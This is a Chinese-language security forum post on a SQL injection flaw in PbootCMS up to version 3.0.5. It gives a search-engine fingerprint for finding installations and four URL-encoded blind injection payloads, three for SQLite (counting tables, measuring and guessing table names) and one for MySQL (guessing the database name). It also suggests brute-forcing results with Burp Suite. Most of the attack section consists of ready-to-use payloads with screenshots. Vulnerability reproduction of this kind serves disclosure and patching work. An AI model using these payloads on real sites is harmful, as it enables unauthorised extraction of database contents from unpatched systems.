问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
PbootCMS domain SQL注入漏洞
# PbootCMS domain SQL注入漏洞 ## 漏洞描述 PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息 ## 漏洞影响 PbootCMS <= 3.0.5 ## 网络测绘 app="PB...
PbootCMS domain SQL注入漏洞 ======================= 漏洞描述 ---- PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息 漏洞影响 ---- PbootCMS <= 3.0.5 网络测绘 ---- app="PBOOTCMS" 漏洞复现 ---- 本地搭建好最新版本,访问首页 ![img](https://shs3.b.qianxin.com/butian_public/f550509262a2d541084e81aefd6fe50ff5ec1027603cb.jpg) 我们需要访问一个存在的页面 url中13后加个单引号 ' ![img](https://shs3.b.qianxin.com/butian_public/f63036143949a096d0ae9589f9bd75b50535b1ad7ba35.jpg) 若为执行sql报错相关,则漏洞存在 若显示下图 ![img](https://shs3.b.qianxin.com/butian_public/f5322015851d8c16b3007c6d1b842b24aaffd1d7ed923.jpg) 则漏洞无法利用 程序默认搭建为sqlite3数据库, Fuzz当前数据库表单payload ```plain ')%0aand%0a(SELECT%0acount(tbl_name)%0aFROM%0asqlite_master%0aWHERE%0atype%3d'ta ble'%0aand%0atbl_name%0aNOT%0alike%0a'sqlite_%')<40-- ``` ![img](https://shs3.b.qianxin.com/butian_public/f7475087c21a3e2147a2d4011a962a46543fffb63ebe9.jpg) 通过此payload进行盲注Fuzz数据库中表单总数是否小于40 查询为真返回正常,假则报错 ![img](https://shs3.b.qianxin.com/butian_public/f36149097e2032c8f1582465df5f128e44a279314b291.jpg) 由此我们可以准确推断出表单总数 计算sqlite数据库中第一个表名长度,我们可以使用如下payload: ```plain ')%0aand%0a(SELECT%0alength(tbl_name)%0aFROM%0asqlite_master%0aWHERE%0atype%3d't able'%0aand%0atbl_name%0aNOT%0alike%0a'sqlite_%'%0alimit%0a1%0aoffset%0a0)<8-- ``` ![img](https://shs3.b.qianxin.com/butian_public/f518902da6f90e7b6a91cc0088f8b74de27232d314895.jpg) 猜解第一个表名称,我们可以使用如下payload: ```plain ')%0aand%0a(SELECT%0asubstr(tbl_name,1,1)%0aFROM%0asqlite_master%0aWHERE%0atype% 3d'table'%0aand%0atbl_name%0aNOT%0alike%0a'sqlite_%'%0alimit%0a1%0aoffset%0a0)%3d'a'-- ``` ![img](https://shs3.b.qianxin.com/butian_public/f955493572eecdb40eef6e34035175ed07f9c74da5ff5.jpg) 这样可以得到数据库第一个表的第一位数值为字符串"a" 通过substr()函数,我们可以很轻松的得到表名称. 同理可获取其他数据 #### 在Mysql下的利用方式 猜解当前数据库名称 可以使用如下payload进行Fuzz: ```plain ')%0aand%0a(select%0asubstr(database(),1,1)%3d'p')%23 ``` 查询为真时页面将返回正常. 使用Burpsuite可以爆破出数据库名称,其他表名字段名等方法相同 (附: <https://github.com/Catw0rld/vulner/issues/1>)
发表于 2024-07-12 18:43:30
阅读 ( 1196 )
分类:
CMS
0 推荐
收藏
0 条评论
请先
登录
后评论
带头大哥
456 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!